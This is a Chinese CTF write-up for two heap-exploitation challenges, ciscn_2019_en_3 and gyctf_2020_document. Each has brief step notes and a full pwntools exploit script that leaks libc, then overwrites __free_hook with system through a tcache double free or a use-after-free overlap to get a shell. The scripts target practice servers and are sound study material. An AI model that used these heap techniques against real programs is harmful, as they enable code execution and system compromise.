ciscn_2019_en_3

1、首先利用 puts 函数泄露：ID 输入长度恰好为 8 时字符串没有 NUL 结尾，puts 会连带打印紧跟在缓冲区后面的一个 libc 指针（以 0x7f 这个高字节识别）。注意泄露出来的是 libc 内的某个地址而不是基址，还要减去一个固定偏移才能得到 libc 基址。

2、申请两个chunk,chunk1内容为/bin/sh

3、对 chunk0 做 tcache double free，再篡改其 next 指针让 malloc 把 __free_hook 分配出来，改写为 system。注意这依赖 libc-2.27 的 tcache 没有 double free 检测；glibc 2.29 起加入了 key 字段检查，同样的两次 free 会直接报 "free(): double free detected in tcache 2"。

4、释放chunk1

比较基础，只用到了 tcache double free 和 __free_hook 劫持两个技巧（前者只在 2.29 之前的 tcache 上可以直接使用）。

exp:

#coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

# Target binary plus the two libc builds the challenge might ship; only
# libc_27 is actually used for symbol offsets below.
pe='./ciscn_2019_en_3'
libc_23='./libc-2.23.so'
libc_27='./libc-2.27.so'
ip,port = 'node3.buuoj.cn',27452
elf=ELF(pe)
libc=ELF(libc_27)

# Run as `python exp.py REMOTE` to attack the remote instance; otherwise a
# local process is spawned.  NOTE(review): the local process is started with
# no loader/LD_PRELOAD override, so unless the binary was patched to use
# ./libc-2.27.so the offsets read from libc_27 only apply to the remote.
if args['REMOTE']:
    p = remote(ip,port)
else:
    p = process(pe)

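def get_one(arch='64', version='2.27'):
    """Return the one_gadget candidate offsets for a glibc build.

    The original read `arch` and `version` from module globals that are never
    defined, so any call raised NameError; they are now parameters.  The
    default mirrors the libc this script loads (libc-2.27).

    Args:
        arch: target bitness; only '64' has a table.
        version: glibc version string, '2.23' or '2.27'.

    Returns:
        list of one_gadget offsets relative to the libc base.

    Raises:
        ValueError: no table for the arch/version combination.

    NOTE(review): one_gadget offsets are specific to a distro *build*, not just
    the glibc version -- the commented-out numbers in the original look like the
    same gadgets for another build of the same version.  Always re-run
    one_gadget against the exact libc you are targeting.
    """
    table = {
        # other build seen in the original: 0x45216, 0x4526a, 0xf02a4, 0xf1147
        ('64', '2.23'): [0x45226, 0x4527a, 0xf0364, 0xf1207],
        # other build seen in the original: 0x4f2c5, 0x4f322, 0x10a38c
        ('64', '2.27'): [0x4f365, 0x4f3c2, 0x10a45c],
    }
    key = (str(arch), str(version))
    if key not in table:
        raise ValueError('no one_gadget table for arch=%r glibc=%r' % key)
    # Return a copy so callers cannot mutate the shared table.
    return list(table[key])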

def add(size, content):
    """Menu option 1: allocate a story of `size` bytes holding `content`.

    Drives the global tube `p`; prompts are matched verbatim against the
    binary's output.
    """
    conversation = (
        ("Input your choice:", '1'),
        ("Please input the size of story: \n", str(size)),
        ("please inpute the story: \n", content),
    )
    for prompt, answer in conversation:
        p.recvuntil(prompt)
        p.sendline(answer)

def delete(index):
    """Menu option 4: free the story at `index` (global tube `p`)."""
    conversation = (
        ("Input your choice:", '4'),
        ("Please input the index:\n", str(index)),
    )
    for prompt, answer in conversation:
        p.recvuntil(prompt)
        p.sendline(answer)



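def main():
    """Run the exploit chain against the global tube `p`.

    1. Leak a libc pointer through the un-terminated 8-byte ID echo and derive
       the libc base.
    2. Double-free chunk 0 into tcache (glibc 2.27 has no double-free check).
    3. Poison its tcache next pointer so malloc hands out __free_hook, then
       write system() there.
    4. free() the chunk holding "/bin/sh" -> system("/bin/sh").
    """
    p.sendlineafter('name?\n', '123')
    # An ID of exactly 8 bytes is echoed back with a libc pointer right
    # behind it; a 64-bit userland pointer is recognised by its 0x7f top byte.
    # b'\x00' (not '\x00') keeps bytes.ljust() working on Python 3.
    p.sendlineafter('input your ID.\n', 'a' * 8)
    leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
    success('leak: ' + hex(leak))

    # Distance from the leaked pointer to the libc base, expressed by the
    # author as __libc_start_main + 231 + 0x5f6a0.  NOTE(review): measured for
    # this particular libc-2.27 build; re-derive in gdb if the target differs.
    base = leak - 0x5f6a0 - 231 - libc.symbols['__libc_start_main']
    if base & 0xfff:
        # A misaligned base means the leak or the offset is wrong; stop here
        # rather than corrupt the heap with garbage addresses.
        log.error('libc base %#x is not page aligned -- leak/offset mismatch' % base)
    free_hook = base + libc.symbols['__free_hook']
    system = base + libc.symbols['system']
    success('base: ' + hex(base))
    success('system: ' + hex(system))
    success('free_hook: ' + hex(free_hook))

    add(0x20, 'aaaa')       # index 0: the chunk we double free
    add(0x20, '/bin/sh')    # index 1: argument for system() once the hook is hijacked
    # glibc 2.27 tcache does not detect double frees (the `key` check only
    # arrived in 2.29), so chunk 0 is now listed twice in the 0x30 bin.
    delete(0)
    delete(0)
    # 1st malloc returns chunk 0 and we overwrite its next pointer; the 2nd
    # returns chunk 0 again; the 3rd returns __free_hook itself.
    add(0x20, p64(free_hook))
    add(0x20, p64(free_hook))
    add(0x20, p64(system))
    # free(chunk 1) is now system("/bin/sh").
    delete(1)
    p.interactive()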

# Script entry point: everything above only defines helpers and opens `p`.
if __name__ == '__main__':
    main()

gyctf_2020_document

同样是free_hook劫持的问题

1、存在 UAF：remove 之后仍然可以 show 已释放的条目，由此直接泄露出 libc 地址
2、泄露libc后,由于第一个chunk被释放了,并且edit函数编辑的是chunk+0x10的偏移位置,所以我们再申请两个chunk
3、这个时候可以发现 idx 为 0 的条目的头部指向了 idx 为 3 的条目头部的 prev_size 位置，两者已经 overlap；于是直接覆盖 chunk3 中那个指向堆的指针，把它改成与 __free_hook（或 __malloc_hook）相差 0x10 的地址，这样下一步 edit(3) 从 +0x10 处写入时正好落在 hook 上
4、经过调试发现 __free_hook 周围的内存都是 0，所以 edit(3) 写入 system 之后补的那些 0 只是把原本就是 0 的区域重写了一遍，不会破坏别的数据；这样就把 __free_hook 覆盖成了 system

5、释放chunk1拿到shell

exp:

#coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

pe='./gyctf_2020_document'
# NOTE(review): despite its name, libc_23 is the host's own libc and it is the
# one every symbol offset below is read from -- a REMOTE run therefore only
# works if the host libc is the same build as the remote one.
libc_23='/lib/x86_64-linux-gnu/libc.so.6'
libc_27='./libc-2.27.so'
ip,port = 'node3.buuoj.cn',26272
elf=ELF(pe)
libc=ELF(libc_23)

# Run as `python exp.py REMOTE` to attack the remote instance; otherwise a
# local process is spawned.
if args['REMOTE']:
    p = remote(ip,port)
else:
    p = process(pe)

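def get_one(arch='64', version='2.23'):
    """Return the one_gadget candidate offsets for a glibc build.

    The original read `arch` and `version` from module globals that are never
    defined, so any call raised NameError; they are now parameters.  The
    default mirrors the `libc_23` variable this script loads its libc from.

    Args:
        arch: target bitness; only '64' has a table.
        version: glibc version string, '2.23' or '2.27'.

    Returns:
        list of one_gadget offsets relative to the libc base.

    Raises:
        ValueError: no table for the arch/version combination.

    NOTE(review): one_gadget offsets are specific to a distro *build*, not just
    the glibc version -- the commented-out numbers in the original look like the
    same gadgets for another build of the same version.  Always re-run
    one_gadget against the exact libc you are targeting.
    """
    table = {
        # other build seen in the original: 0x45216, 0x4526a, 0xf02a4, 0xf1147
        ('64', '2.23'): [0x45226, 0x4527a, 0xf0364, 0xf1207],
        # other build seen in the original: 0x4f2c5, 0x4f322, 0x10a38c
        ('64', '2.27'): [0x4f365, 0x4f3c2, 0x10a45c],
    }
    key = (str(arch), str(version))
    if key not in table:
        raise ValueError('no one_gadget table for arch=%r glibc=%r' % key)
    # Return a copy so callers cannot mutate the shared table.
    return list(table[key])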


def add(name,sex,context):
    """Menu option 1: create an entry with the given name, sex and information.

    Drives the global tube `p`.  Every field is sent with sendafter (no
    trailing newline), matching how the binary reads its input.
    """
    conversation = [
        ('Give me your choice : ', '1'),
        ('input name', str(name)),
        ('input sex', str(sex)),
        ('input information', str(context)),
    ]
    for prompt, answer in conversation:
        p.sendafter(prompt, answer)

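def show(index):
    """Menu option 2: display entry `index` and return the libc address it leaks.

    The original computed the value and then dropped it (no return), which is
    why main() had to duplicate this logic inline.

    Reads until the 0x7f top byte of a 64-bit userland pointer and subtracts
    0x3a4428, the author's measured distance from that pointer to
    __libc_start_main.  NOTE(review): that delta is build specific -- re-measure
    for any libc other than the author's.

    Returns:
        int: candidate address of __libc_start_main.
    """
    p.sendafter('Give me your choice :', '2')
    p.sendlineafter('Give me your index :', str(index))
    p.recv()  # drain pending output so the next read starts at the pointer
    # [-6:] keeps only the pointer bytes; b'\x00' keeps ljust() valid on Python 3.
    leaked = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x3a4428
    success('data : ' + hex(leaked))
    return leaked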

def edit(index,sex,context):
    """Menu option 3: rewrite the sex and information fields of entry `index`.

    Drives the global tube `p`; all replies go out via sendafter (no newline).
    """
    conversation = [
        ('Give me your choice :', '3'),
        ('Give me your index :', str(index)),
        ('Are you sure change sex?', str(sex)),
        ('Now change information', str(context)),
    ]
    for prompt, answer in conversation:
        p.sendafter(prompt, answer)

def remove(index):
    """Menu option 4: delete (free) entry `index` via the global tube `p`."""
    conversation = [
        ('Give me your choice :', '4'),
        ('Give me your index :', str(index)),
    ]
    for prompt, answer in conversation:
        p.sendafter(prompt, answer)

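def main():
    """Run the exploit chain against the global tube `p`.

    Leak libc through the UAF show(), compute the libc base, then use the
    overlapping entries to redirect entry 3's pointer at __free_hook, write
    system() through it and trigger free() on a "/bin/sh" string.

    Fixes over the original: the stray `print(type(data))` referenced a name
    that does not exist in this scope (it was a local of show()) and raised
    NameError before the exploit got anywhere; gdb.attach() is now skipped for
    REMOTE runs; the leak parse is Python 3 safe.
    """
    add('aaaaaaaa', 'w', '\x00' * 112)  # 0
    add('bbbbbbbb', 'W', '\x00' * 112)  # 1
    remove(0)

    # UAF: show() on the freed entry 0 still prints through its stale pointer
    # and leaks a libc address (recognised by its 0x7f top byte).  p.recv()
    # drains the pending output so recvuntil starts at the pointer bytes.
    p.sendafter('Give me your choice :', '2')
    p.sendlineafter('Give me your index :', '0')
    p.recv()
    leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
    # NOTE(review): 0x3a4428 is the author's measured distance from the leaked
    # pointer to __libc_start_main in *their* local libc; re-measure elsewhere.
    libc_start_main_addr = leak - 0x3a4428
    success('libc_start_main_addr : ' + hex(libc_start_main_addr))

    # `offset` is the libc base; it must be page aligned or the leak/delta is wrong.
    offset = libc_start_main_addr - libc.symbols['__libc_start_main']
    if offset & 0xfff:
        log.error('libc base %#x is not page aligned -- leak/offset mismatch' % offset)
    free_hook_addr = offset + libc.symbols['__free_hook']
    system_addr = offset + libc.symbols['system']
    bin_addr = offset + next(libc.search("/bin/sh"))
    success('free_hook: ' + hex(free_hook_addr))
    success("system: " + hex(system_addr))
    success("bin_addr: " + hex(bin_addr))

    # Attaching a debugger only makes sense for a local process.
    if not args['REMOTE']:
        gdb.attach(p)

    add('/bin/sh\x00', 'W', '\x11' * 112)  # 2
    remove(1)
    add('/bin/sh\x00', 'W', '\x22' * 112)  # 3
    # Written through the stale entry 0 (its data starts at +0x10), this lands
    # on entry 3's header region according to the writeup: a fake 0x21 size
    # word, then the heap pointer field redirected to __free_hook - 0x10 so
    # that entry 3's own +0x10 information write hits __free_hook exactly.
    # NOTE(review): layout taken from the author's gdb session -- confirm it
    # before reusing against another build.
    payload = (p64(0) + p64(0x21) + p64(free_hook_addr - 0x10) + p64(0x1)
               + p64(0) + p64(0x51) + p64(0) * 8)
    edit(0, 'Y', payload)
    # system() lands on __free_hook; the trailing zeros overwrite memory the
    # author observed to be zero already.
    edit(3, 'Y', p64(system_addr) + p64(0) * 13)
    # free() through the hijacked hook.  NOTE(review): slot 1 was freed above
    # and is presumably re-populated by the following add(); confirm the
    # binary's slot-reuse logic if this does not pop a shell.
    remove(1)
    p.interactive()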

# Script entry point: everything above only defines helpers and opens `p`.
if __name__ == '__main__':
    main()